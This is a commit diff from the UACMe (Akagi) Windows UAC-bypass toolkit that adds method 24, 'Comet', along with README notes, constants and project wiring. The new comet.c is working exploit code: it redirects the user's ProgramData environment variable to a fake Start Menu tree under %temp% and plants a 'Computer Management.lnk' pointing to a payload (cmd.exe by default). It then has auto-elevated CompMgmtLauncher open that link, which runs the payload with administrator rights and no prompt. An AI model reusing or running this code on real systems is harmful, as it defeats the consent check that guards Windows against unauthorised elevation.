v 2.5.2

Comet integrated as #24

README.md

@@ -35,7 +35,8 @@ Keys (watch debug ouput with dbgview or similar for more info):
 * 20 - Hybrid method, abusing Microsoft Management Console and incorrect dll loading scheme, works from Windows 7 up to 10rs2 14997;
 * 21 - Hybrid method, abusing SxS DotLocal and targeting sysprep, works from Windows 7 up to 10rs2 14997;
 * 22 - Hybrid method, abusing SxS DotLocal and targeting consent to gain system privileges, works from Windows 7 up to 10rs2 14997;
-* 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 14997.
+* 23 - Hybrid method, abusing Package Manager and DISM, works from Windows 7 up to 10rs2 14997;
+* 24 - Original Comet method from BreakingMalware, abuses current user environment variables and CompMgmtLauncher.exe, works from Windows 7 up to 10rs2 15007.
 
 Note:
 * Several methods require process injection, so they won't work from wow64, use x64 edition of this tool;
@@ -85,7 +86,7 @@ Methods fixed:
 * 22 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work);
 * 23 - Windows 10 RS2 starting from public 1500X build (delivery interface altered, method itself still work).
 
-Currently, 16 January 2017 Windows 10 RS2 starting from 1500X builds is the most protected Microsoft OS ever made.
+** 24 is not fixed as at 17 January 2017.
 
 
 If you wondering why this still exist and work here is the explanation, an official Microsoft WHITEFLAG (including totally incompetent statements as bonus)
@@ -105,8 +106,8 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
 
 # VirusTotal reference report
 
-* Akagi32 https://www.virustotal.com/en/file/4804d5dea63b2ee5629712f79ce9d655823e33cf721640fba22411f116ba867b/analysis/
+* Akagi32 https://www.virustotal.com/en/file/f662645187d424cbaad77fb597a2071befd16298f180f89a066fcc3a8ebfebcc/analysis/
-* Akagi64 https://www.virustotal.com/en/file/9b0a1c6bbc11cd3e2203b47dcf3e44be6e6a74763dfa56298dfb8dacade477a5/analysis/
+* Akagi64 https://www.virustotal.com/en/file/2ffcae26fce95ab0e87814968ce5d4401d0778020d25114ae01da4d08d64cf17/analysis/
 
 # Build 
 
@@ -120,6 +121,7 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105
 * Junfeng Zhang from WinSxS dev team blog, https://blogs.msdn.microsoft.com/junfeng/
 * Beyond good ol' Run key, series of articles, http://www.hexacorn.com/blog
 * KernelMode.Info UACMe thread, http://www.kernelmode.info/forum/viewtopic.php?f=11&t=3643
+* Command Injection/Elevation – Environment Variables Revisited, https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
 
  
 # Authors

Source/Akagi/comet.c

@@ -0,0 +1,188 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2016 - 2017
+*
+*  TITLE:       COMET.C
+*
+*  VERSION:     2.52
+*
+*  DATE:        17 Jan 2017
+*
+*  Comet method (c) BreakingMalware
+*  For description please visit original URL 
+*  https://breakingmalware.com/vulnerabilities/command-injection-and-elevation-environment-variables-revisited
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#include "global.h"
+#include <ShlGuid.h>
+#include <ShObjIdl.h>
+
+/*
+* ucmSetEnvVariable
+*
+* Purpose:
+*
+* Remove of set current user environment variable.
+*
+*/
+BOOL ucmSetEnvVariable(
+	_In_ BOOL fRemove,
+	_In_ LPWSTR lpVariableName,
+	_In_opt_ LPWSTR lpVariableData
+	)
+{
+	BOOL	bResult = FALSE, bCond = FALSE;
+	HKEY    hKey = NULL;
+
+	do {
+		if (lpVariableName == NULL)
+			break;
+
+		if ((lpVariableData == NULL) && (fRemove != TRUE))
+			break;
+			
+		if (RegOpenKey(HKEY_CURRENT_USER, L"Environment", &hKey) != ERROR_SUCCESS)
+			break;
+
+		if (fRemove) {
+			RegDeleteValue(hKey, lpVariableName);
+		}
+		else {
+			if (RegSetValueEx(hKey, lpVariableName, 0, REG_SZ, (BYTE*)lpVariableData,
+				(DWORD)(_strlen(lpVariableData) * sizeof(WCHAR))) != ERROR_SUCCESS)
+			{
+				break;
+			}
+		}
+		bResult = TRUE;
+
+	} while (bCond);
+
+	return bResult;
+}
+
+/*
+* ucmCometMethod
+*
+* Purpose:
+*
+* Fool autoelevated application with help of manipulation of the current user environment variables.
+* CompMgmtLauncher.exe is a moronic .LNK ShellExecute launcher application. 
+* Only MS do system trusted applications which only purpose is to LAUNCH .LNK files.
+*
+*/
+BOOL ucmCometMethod(
+	LPWSTR lpszPayload
+	)
+{
+#ifndef _WIN64
+    PVOID   OldValue = NULL;
+#endif
+
+    BOOL    bCond = FALSE, bResult = FALSE;
+	WCHAR   szCombinedPath[MAX_PATH * 2], szLinkFile[MAX_PATH * 3];
+	HRESULT hResult;
+
+	IPersistFile    *persistFile = NULL;
+	IShellLink      *newLink = NULL;
+
+#ifndef _WIN64
+    if (g_ctx.IsWow64) {
+		if (!NT_SUCCESS(RtlWow64EnableFsRedirectionEx((PVOID)TRUE, &OldValue)))
+			return FALSE;
+	}
+#endif
+
+	do {
+
+		RtlSecureZeroMemory(szCombinedPath, sizeof(szCombinedPath));
+		_strcpy(szCombinedPath, g_ctx.szTempDirectory);
+		_strcat(szCombinedPath, L"huy32");
+		if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet
+			if (GetLastError() != ERROR_ALREADY_EXISTS)
+				break;
+		}
+
+		_strcpy(szLinkFile, szCombinedPath);
+		_strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
+		if (!CreateDirectory(szLinkFile, NULL)) {//%temp%\<targetdir>\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
+			if (GetLastError() != ERROR_ALREADY_EXISTS)
+				break;
+		}
+
+		if (!ucmSetEnvVariable(FALSE, T_PROGRAMDATA, szCombinedPath))
+			break;
+
+		_strcat(szCombinedPath, TEXT("\\Microsoft"));
+		if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft
+			if (GetLastError() != ERROR_ALREADY_EXISTS)
+				break;
+		}
+
+		_strcat(szCombinedPath, TEXT("\\Windows"));
+		if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows
+			if (GetLastError() != ERROR_ALREADY_EXISTS)
+				break;
+		}
+
+		_strcat(szCombinedPath, TEXT("\\Start Menu"));
+		if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu
+			if (GetLastError() != ERROR_ALREADY_EXISTS)
+				break;
+		}
+
+		_strcat(szCombinedPath, TEXT("\\Programs"));
+		if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs
+			if (GetLastError() != ERROR_ALREADY_EXISTS)
+				break;
+		}
+
+		_strcat(szCombinedPath, TEXT("\\Administrative Tools"));
+		if (!CreateDirectory(szCombinedPath, NULL)) {//%temp%\Comet\Microsoft\Windows\Start Menu\Programs\Administrative Tools
+			if (GetLastError() != ERROR_ALREADY_EXISTS)
+				break;
+		}
+
+		hResult = CoInitialize(NULL);
+		if (SUCCEEDED(hResult)) {
+			hResult = CoCreateInstance(&CLSID_ShellLink, NULL, CLSCTX_INPROC_SERVER, &IID_IShellLink, (LPVOID *)&newLink);
+			if (SUCCEEDED(hResult)) {
+				newLink->lpVtbl->SetPath(newLink, lpszPayload);
+				newLink->lpVtbl->SetArguments(newLink, L"");
+				newLink->lpVtbl->SetDescription(newLink, L"Comet method");
+				hResult = newLink->lpVtbl->QueryInterface(newLink, &IID_IPersistFile, (void **)&persistFile);
+				if (SUCCEEDED(hResult)) {
+					_strcpy(szLinkFile, szCombinedPath);
+					_strcat(szLinkFile, L"\\Computer Management.lnk");
+					if (SUCCEEDED(persistFile->lpVtbl->Save(persistFile, szLinkFile, TRUE))) {
+						persistFile->lpVtbl->Release(persistFile);
+
+						_strcpy(szCombinedPath, g_ctx.szTempDirectory);
+						_strcat(szCombinedPath, L"huy32");
+						_strcpy(szLinkFile, szCombinedPath);
+						_strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
+
+						ShellExecute(NULL, L"Manage", szLinkFile, L"", szCombinedPath, SW_SHOW);
+						bResult = TRUE;
+					}
+				}
+				newLink->lpVtbl->Release(newLink);
+			}
+		}
+
+	} while (bCond);
+
+#ifndef _WIN64
+	if (g_ctx.IsWow64) {
+		RtlWow64EnableFsRedirectionEx(OldValue, &OldValue);
+	}
+#endif
+
+    ucmSetEnvVariable(TRUE, T_PROGRAMDATA, NULL);
+	return bResult;
+}

Source/Akagi/comet.h

@@ -0,0 +1,23 @@
+/*******************************************************************************
+*
+*  (C) COPYRIGHT AUTHORS, 2016 - 2017
+*
+*  TITLE:       COMET.H
+*
+*  VERSION:     2.52
+*
+*  DATE:        17 Jan 2017
+*
+*  Prototypes and definitions for Comet method.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+#pragma once
+
+BOOL ucmCometMethod(
+    LPWSTR lpszPayload
+    );

Source/Akagi/consts.h

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2015 - 2016
+*  (C) COPYRIGHT AUTHORS, 2015 - 2017
 *
 *  TITLE:       CONSTS.H
 *
-*  VERSION:     2.51
+*  VERSION:     2.52
 *
-*  DATE:        11 July 2016
+*  DATE:        17 Jan 2017
 *
 *  Global consts definition file.
 *
@@ -31,7 +31,9 @@
 #define T_IID_ISecurityEditor       L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}"
 #define ISECURITYEDITOR_ELEMONIKER  L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}" 
 #define IFILEOP_ELEMONIKER          L"Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}"
+#define T_CLSID_MYCOMPUTER_COMET    L"\\Comet.{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
 #define T_SDDL_ALL_FOR_EVERYONE     L"D:(A;;GA;;;WD)"
+#define T_PROGRAMDATA               L"ProgramData"
 
 #define MANIFEST_EXT                L".manifest"
 #define ELLOCNAK_MSU                L"ellocnak.msu" 
@@ -56,7 +58,6 @@
 #define DEVOBJ_DLL                  L"devobj.dll"
 #define UNBCL_DLL                   L"unbcl.dll"
 #define DISMCORE_DLL                L"dismcore.dll"
-#define WOW64LOG_DLL                L"wow64log.dll"
 #define CLICONFG_EXE                L"cliconfg.exe"
 #define OOBE_EXE                    L"oobe.exe"
 #define WINSAT_EXE                  L"winsat.exe"
@@ -82,6 +83,8 @@
 #define RSOP_MSC                    L"rsop.msc"
 #define PACKAGE_XML                 L"ellocnak.xml"
 
+#define T_DEFAULT_CMD               L"%systemroot%\\system32\\cmd.exe"
+
 #define LOCAL_SXS                   L".local"
 #define FAKE_LOCAL_SXS              L".hawawa"
 #define INETMGR_SXS                 L"microsoft-windows-iis-managementconsole"

Source/Akagi/global.h

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2014 - 2016
+*  (C) COPYRIGHT AUTHORS, 2014 - 2017
 *
 *  TITLE:       GLOBAL.H
 *
-*  VERSION:     2.51
+*  VERSION:     2.52
 *
-*  DATE:        10 July 2016
+*  DATE:        17 Jan 2017
 *
 *  Common header file for the program support routines.
 *
@@ -77,7 +77,7 @@ typedef enum _UACBYPASSMETHOD {
     UacMethodSXS,
     UacMethodSXSConsent,
     UacMethodDISM,
-    //UacMethod24,
+    UacMethodComet,
     UacMethodMax
 } UACBYPASSMETHOD;
 
@@ -97,6 +97,7 @@ typedef enum _UACBYPASSMETHOD {
 #include "simda.h"
 #include "carberp.h"
 #include "hybrids.h"
+#include "comet.h"
 
 //default execution flow
 #define AKAGI_FLAG_KILO  0

Source/Akagi/gootkit.c

@@ -1,13 +1,13 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2014 - 2016,
+*  (C) COPYRIGHT AUTHORS, 2014 - 2017,
 *  (C) MS FixIT Shim Patches revealed by Jon Erickson
 *
 *  TITLE:       GOOTKIT.C
 *
-*  VERSION:     2.51
+*  VERSION:     2.52
 *
-*  DATE:        11 July 2016
+*  DATE:        17 Jan 2017
 *
 *  Gootkit based AutoElevation using AppCompat.
 *
@@ -487,7 +487,7 @@ BOOL ucmAppcompatElevation(
         if (Method == UacMethodRedirectExe) {
 
             if (lpszPayloadEXE == NULL) {
-                _strcpy_w(szBuffer, L"%systemroot%\\system32\\cmd.exe");
+                _strcpy_w(szBuffer, T_DEFAULT_CMD);
                 bResult = ucmShimRedirectEXE(szBuffer);
             }
             else {

Source/Akagi/main.c

@@ -1,12 +1,12 @@
 /*******************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2014 - 2016
+*  (C) COPYRIGHT AUTHORS, 2014 - 2017
 *
 *  TITLE:       MAIN.C
 *
-*  VERSION:     2.51
+*  VERSION:     2.52
 *
-*  DATE:        11 July 2016
+*  DATE:        17 Jan 2017
 *
 *  Program entry point.
 *
@@ -485,6 +485,11 @@ UINT ucmMain()
         ucmShowMessage(WIN64ONLY);
         return ERROR_UNSUPPORTED_TYPE;
 #else
+        //fixed in 15007
+        if (g_ctx.dwBuildNumber > 14997) {
+            if (ucmShowQuestion(UACFIX) == IDNO)
+                return ERROR_UNSUPPORTED_TYPE;
+        }
 #endif
         break;
 
@@ -493,6 +498,11 @@ UINT ucmMain()
         ucmShowMessage(WIN64ONLY);
         return ERROR_UNSUPPORTED_TYPE;
 #else
+        //fixed in 15007
+        if (g_ctx.dwBuildNumber > 14997) {
+            if (ucmShowQuestion(UACFIX) == IDNO)
+                return ERROR_UNSUPPORTED_TYPE;
+        }
 #endif
         break;
 
@@ -501,6 +511,11 @@ UINT ucmMain()
         ucmShowMessage(WIN64ONLY);
         return ERROR_UNSUPPORTED_TYPE;
 #else
+        //fixed in 15007
+        if (g_ctx.dwBuildNumber > 14997) {
+            if (ucmShowQuestion(UACFIX) == IDNO)
+                return ERROR_UNSUPPORTED_TYPE;
+        }
 #endif
         break;
 
@@ -509,9 +524,16 @@ UINT ucmMain()
         ucmShowMessage(WIN64ONLY);
         return ERROR_UNSUPPORTED_TYPE;
 #else
+        //fixed in 15007
+        if (g_ctx.dwBuildNumber > 14997) {
+            if (ucmShowQuestion(UACFIX) == IDNO)
+                return ERROR_UNSUPPORTED_TYPE;
+        }
 #endif
         break;
 
+    case UacMethodComet:
+        break;
     }
 
     //prepare command for payload
@@ -519,7 +541,7 @@ UINT ucmMain()
     RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
     GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
     if (paramLen > 0) {
-        if (g_ctx.Method != UacMethodRedirectExe) {
+        if ((g_ctx.Method != UacMethodRedirectExe) && (g_ctx.Method != UacMethodComet)) {
             supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
         }
     }
@@ -743,6 +765,11 @@ UINT ucmMain()
         break;
 
 #endif
+    case UacMethodComet:
+        if (ucmCometMethod((paramLen != 0) ? szBuffer : T_DEFAULT_CMD)) {
+            return ERROR_SUCCESS;
+        }
+        break;
 
     }
 

Source/Akagi/uacme.vcxproj

@@ -240,6 +240,7 @@
     <ClCompile Include="..\shared\_strncpy.c" />
     <ClCompile Include="..\Shared\_strstri.c" />
     <ClCompile Include="carberp.c" />
+    <ClCompile Include="comet.c" />
     <ClCompile Include="gootkit.c" />
     <ClCompile Include="hybrids.c" />
     <ClCompile Include="main.c" />
@@ -255,6 +256,7 @@
     <ClInclude Include="..\Shared\_filename.h" />
     <ClInclude Include="apphelp.h" />
     <ClInclude Include="carberp.h" />
+    <ClInclude Include="comet.h" />
     <ClInclude Include="compress.h" />
     <ClInclude Include="consts.h" />
     <ClInclude Include="global.h" />

Source/Akagi/uacme.vcxproj.filters

@@ -87,6 +87,9 @@
     <ClCompile Include="..\Shared\_strstri.c">
       <Filter>minirtl</Filter>
     </ClCompile>
+    <ClCompile Include="comet.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="global.h">
@@ -137,6 +140,9 @@
     <ClInclude Include="manifest.h">
       <Filter>Header Files</Filter>
     </ClInclude>
+    <ClInclude Include="comet.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ResourceCompile Include="Resource.rc">

Source/Akagi/uacme.vcxproj.user

@@ -9,11 +9,11 @@
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
-    <LocalDebuggerCommandArguments>23</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>24</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LocalDebuggerCommandArguments>23</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>24</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>

Source/Shared/ntos.h

@@ -1,12 +1,12 @@
 /************************************************************************************
 *
-*  (C) COPYRIGHT AUTHORS, 2015 - 2016, translated from Microsoft sources/debugger
+*  (C) COPYRIGHT AUTHORS, 2015 - 2017, translated from Microsoft sources/debugger
 *
 *  TITLE:       NTOS.H
 *
-*  VERSION:     1.47
+*  VERSION:     1.51
 *
-*  DATE:        10 July 2016
+*  DATE:        18 Jan 2017
 *
 *  Common header file for the ntos API functions and definitions.
 *
@@ -109,6 +109,18 @@
 #define TRACELOG_ACCESS_REALTIME      0x0400
 #define TRACELOG_REGISTER_GUIDS       0x0800
 
+//
+// Partition Specific Access Rights.
+//
+
+#define MEMORY_PARTITION_QUERY_ACCESS  0x0001
+#define MEMORY_PARTITION_MODIFY_ACCESS 0x0002
+
+#define MEMORY_PARTITION_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED |         \
+                                     SYNCHRONIZE |                      \
+                                     MEMORY_PARTITION_QUERY_ACCESS |    \
+                                     MEMORY_PARTITION_MODIFY_ACCESS)
+
 #define NtCurrentThread() ( (HANDLE)(LONG_PTR) -2 )
 #define NtCurrentProcess() ( (HANDLE)(LONG_PTR) -1 )
 #define ZwCurrentProcess() NtCurrentProcess()
@@ -128,6 +140,15 @@
 #define MAXUSHORT   0xffff     
 #define MAX_USTRING ( sizeof(WCHAR) * (MAXUSHORT/sizeof(WCHAR)) )
 
+typedef struct _EX_RUNDOWN_REF
+{
+    union
+    {
+        ULONG Count;
+        PVOID Ptr;
+    };
+} EX_RUNDOWN_REF, *PEX_RUNDOWN_REF;
+
 typedef struct _UNICODE_STRING {
 	USHORT Length;
 	USHORT MaximumLength;
@@ -204,6 +225,19 @@ typedef struct _SEMAPHORE_BASIC_INFORMATION {
 ** Semaphore END
 */
 
+/*
+** Kernel Debugger START
+*/
+
+typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION {
+    BOOLEAN KernelDebuggerEnabled;
+    BOOLEAN KernelDebuggerNotPresent;
+} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION;
+
+/*
+** Kernel Debugger END
+*/
+
 /*
 ** FileCache and MemoryList START
 */
@@ -4172,7 +4206,8 @@ typedef struct _KUSER_SHARED_DATA_COMPAT {
 			ULONG DbgConsoleBrokerEnabled : 1;
 			ULONG DbgSecureBootEnabled : 1;
             ULONG DbgMultiSessionSku : 1;
-			ULONG SpareBits : 23;
+            ULONG DbgMultiUsersInSessionSku : 1;
+            ULONG SpareBits : 22;
 		};
 	};
 
@@ -4186,6 +4221,44 @@ typedef struct _KUSER_SHARED_DATA_COMPAT {
 ** KUSER_SHARED_DATA END
 */
 
+/*
+** FLT MANAGER START
+*/
+
+#define FLTFL_MANDATORY_UNLOAD_IN_PROGRESS  0x1
+#define FLTFL_FILTERING_INITIATED           0x2
+#define FLTFL_NAME_PROVIDER                 0x4
+#define FLTFL_SUPPORTS_PIPES_MAILSLOTS      0x8
+
+#define FLT_OBFL_DRAINING                   0x1
+#define FLT_OBFL_ZOMBIED                    0x2
+#define FLT_OBFL_TYPE_INSTANCE              0x1000000
+#define FLT_OBFL_TYPE_FILTER                0x2000000
+#define FLT_OBFL_TYPE_VOLUME                0x4000000
+
+typedef struct _FLT_OBJECT {
+    ULONG Flags;
+    ULONG PointerCount;
+    EX_RUNDOWN_REF RundownRef;
+    LIST_ENTRY PrimaryLink;
+} FLT_OBJECT, *PFLT_OBJECT;
+
+typedef struct _FLT_SERVER_PORT_OBJECT {
+    LIST_ENTRY FilterLink;
+    PVOID ConnectNotify;
+    PVOID DisconnectNotify;
+    PVOID MessageNotify;
+    PVOID Filter;
+    PVOID Cookie;
+    ULONG Flags;
+    ULONG NumberOfConnections;
+    ULONG MaxConnections;
+} FLT_SERVER_PORT_OBJECT, *PFLT_SERVER_PORT_OBJECT;
+
+/*
+** FLT MANAGER END
+*/
+
 /*
 **  RTL START
 */
@@ -4574,6 +4647,16 @@ VOID NTAPI RtlSetLastWin32Error(
 	LONG Win32Error
 	);
 
+
+NTSTATUS NTAPI RtlWow64EnableFsRedirection(
+    _In_ BOOLEAN Wow64FsEnableRedirection
+    );
+
+NTSTATUS NTAPI RtlWow64EnableFsRedirectionEx(
+    _In_ PVOID DisableFsRedirection,
+    _Out_ PVOID *OldFsRedirectionLevel
+    );
+
 typedef NTSTATUS
 (NTAPI * PRTL_HEAP_COMMIT_ROUTINE)(
 	IN PVOID Base,
@@ -5775,6 +5858,14 @@ NTSTATUS NTAPI NtQuerySecurityObject(
 	_Out_	PULONG LengthNeeded
 	);
 
+NTSTATUS NTAPI NtQueryLicenseValue(
+    _In_ PUNICODE_STRING ValueName,
+    _Out_opt_ PULONG Type,
+    _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data,
+    _In_ ULONG DataSize,
+    _Out_ PULONG ResultDataSize
+);
+
 NTSTATUS NtCreateIoCompletion(
 	_Out_		PHANDLE IoCompletionHandle,
 	_In_		ACCESS_MASK DesiredAccess,

UACME.sha256

@@ -1,5 +1,5 @@
-4804d5dea63b2ee5629712f79ce9d655823e33cf721640fba22411f116ba867b *Compiled\Akagi32.exe
+f662645187d424cbaad77fb597a2071befd16298f180f89a066fcc3a8ebfebcc *Compiled\Akagi32.exe
-9b0a1c6bbc11cd3e2203b47dcf3e44be6e6a74763dfa56298dfb8dacade477a5 *Compiled\Akagi64.exe
+2ffcae26fce95ab0e87814968ce5d4401d0778020d25114ae01da4d08d64cf17 *Compiled\Akagi64.exe
 098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln
 8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
@@ -10,29 +10,31 @@ a482ae2d4e1d0a8a1fe69e70c616800cc4cdab41d77bcbf3f391911eb8f3f44d *Source\Akagi\b
 e087dfb09004d72749ffa94e016860683a7c20f147346e1acf0f561da400e9f1 *Source\Akagi\bin64res.rc
 31561a29aeef347b9eb2d763dd13ec5efbf524309ae3e73009e916d5a298213e *Source\Akagi\carberp.c
 35ed70e08dc96bedc4d332edb36799fcee7fe8b743bce7b43a363aacfdb8dc78 *Source\Akagi\carberp.h
+1edbced7c0e0a4623e94cc0cf5eb0b0a892055efdbe120ec99740e7095669ca0 *Source\Akagi\comet.c
+ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\comet.h
 fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c
 be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
-da4ec050a3d7b306021e1f66af6e5eadc6222904c433f83a5e8aea2d5fc5ff15 *Source\Akagi\consts.h
+117b7a1fc984f75cafc6a9613703ef920018f1188ac241aa609dc70f71c0d208 *Source\Akagi\consts.h
-b63833dd4dd9ac82abf04caa3f6d835bc15de6997377eda9763727a0a9de27c9 *Source\Akagi\global.h
+3f7d65507e3c26e9bc01b67b6f305a15337d3f34114a41d1c0c387fc857f8c08 *Source\Akagi\global.h
-027a4bf1e01d7283f72c97bacdf08b845030cc2a2631eb882793bdd22518a632 *Source\Akagi\gootkit.c
+5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
 c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
 46ca3d450773a8b39fc5caccdeabbad1bf7cef0a1694bd94284ca75c02085b38 *Source\Akagi\hybrids.c
 81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
-24e72497fbdbfc3aded5843eee818bf6ab5009edbc29606f26a5959cdcaf4bfe *Source\Akagi\main.c
+4d07f686c54d03cb592a03ac22b03e6012c218e8b771d45afe667fbcad92cf43 *Source\Akagi\main.c
 dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
 67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
 d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h
 7e3ce9159f8d80775c476bfe1e3eaed960cd0053c569ec44791936ae2546301b *Source\Akagi\pitou.c
 7f8aec0ef71310198ba697c1acc8bdeff64279b039b82c6761f110bbd92e6dfb *Source\Akagi\pitou.h
 c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
-652a70321893ccf4ea8df0ed4a72bef230c227b3b2638174cba01717c06454b5 *Source\Akagi\Resource.rc
+dc8f2a3c2bfffb5b88cbfc8ca0d99e38a44d1343ee15013858b99022c6ff2d75 *Source\Akagi\Resource.rc
 d84490cd98b484bb0e8af241df7500efef502525ec7249aa6a5b6f850e2bac77 *Source\Akagi\simda.c
 9d25bcd377d6bc86332ac613cd99362c9881302d403a3e4e1e8c93a266982b32 *Source\Akagi\simda.h
 7e2bee1be67d96edca66ea19aac60896b97449af72da653206102930ae676aca *Source\Akagi\sup.c
 ee7b5b03ff6401b82fae2eb453603cbb7a39d81d1bca1d0cb835e92baaaf4c2d *Source\Akagi\sup.h
-520b30af34233a3c17e546d1bb3a745fe8e9819067a795ec709018da3ba8b7b2 *Source\Akagi\uacme.vcxproj
+472953271f598efcd79e4a741df77188c60bfb3b2867cb7465fa068e387362a9 *Source\Akagi\uacme.vcxproj
-aa3c16d7e1d651a84b04c652c689b4fb1e7b81c1e390860ed0360df51483ee22 *Source\Akagi\uacme.vcxproj.filters
+c6986aecdf474a9ac568fd122956a016c2583156448627c1c9f60d7b08d5f306 *Source\Akagi\uacme.vcxproj.filters
-5ac1b51187339ca0ead48704f9ceb57ae5561eba4eee1267b8a7461dc7e4c130 *Source\Akagi\uacme.vcxproj.user
+69ef84d851e52fa90e78232720740a13addb67a3a72936bf159559db05085cbe *Source\Akagi\uacme.vcxproj.user
 a848ec296f79f6eca82202e1ebf95d69da8ab16cfa336418ce9a9e36fe81ae0c *Source\Akagi\bin\Fubuki32.cd
 0cb9aff9b689c6ffb1b0f307caec4a3b67dbd459a610dcca72cd9be70a4b6094 *Source\Akagi\bin\Fubuki64.cd
 0617a97e15c312915fedfc5f2eebfc2d417cfbd667896bcf9d33846334ae98a4 *Source\Akagi\bin\Hibiki32.cd
@@ -75,7 +77,7 @@ abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Na
 893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
 bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
 107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
-eeb7e2580b8f304693d200b48a0664600d86a9b8323a36fd65e8ed394d563964 *Source\Shared\ntos.h
+0eee79ee4fa4692222fc647159ac532dc2019f568160ca4c9fed9de9cc39b593 *Source\Shared\ntos.h
 b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
 c0dd0e6d2f4b23a97b6cabb9822b87adb6ae8723ee3e65831809e549b7efcb9a *Source\Shared\strtoul.c
 9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712 *Source\Shared\ultostr.c